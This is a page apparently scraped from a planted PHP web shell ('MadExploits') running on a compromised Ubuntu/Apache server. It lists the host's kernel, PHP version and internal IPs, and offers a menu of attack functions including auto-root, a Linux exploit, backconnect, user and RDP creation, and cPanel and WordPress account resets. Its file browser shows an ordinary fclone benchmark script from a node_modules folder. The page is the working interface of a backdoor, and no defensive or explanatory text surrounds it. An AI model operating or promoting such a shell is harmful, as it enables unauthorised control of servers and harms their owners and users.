Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
fclone /
bench /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.36
KB
-rw-rw-r--
looparr.js
642
B
-rw-rw-r--
loopobj.js
639
B
-rw-rw-r--
package.json
413
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict' const Benchmark = require('benchmark') const suite = new Benchmark.Suite function Complex() { this.bar = 'foo' this.foo = new Array(100).fill(0).map(e => Math.random()) } Complex.prototype.method = function() {} const a = {b: 'hello', c: {foo: 'bar', bar: 'foo', error: new Error('Test')}, complex: new Complex()} a.a = a a.c.complex = a.complex a.env = process.env const fclone = require('../dist/fclone.js') const clone = require('clone') const deepcopy = require('deepcopy') const jsonstringifysafe = require('json-stringify-safe') const jsan = require('jsan') const circularjson = require('circular-json-es6') const util = require('util') suite .add('fclone', function() { let b = fclone(a) }) .add('fclone + json.stringify', function() { let b = JSON.stringify(fclone(a)) }) .add('util.inspect (outputs a string)', function() { let b = util.inspect(a) }) .add('jsan', function() { let b = jsan.stringify(a) }) .add('circularjson', function() { let b = circularjson.stringify(a) }) .add('deepcopy', function() { let b = deepcopy(a) }) .add('json-stringify-safe', function() { let b = jsonstringifysafe(a) }) .add('clone', function() { let b = clone(a) }) .on('cycle', function(event) { console.log(String(event.target)) }) .on('complete', function() { console.log('Fastest is ' + this.filter('fastest').map('name')) }) .run({ 'async': true })
Close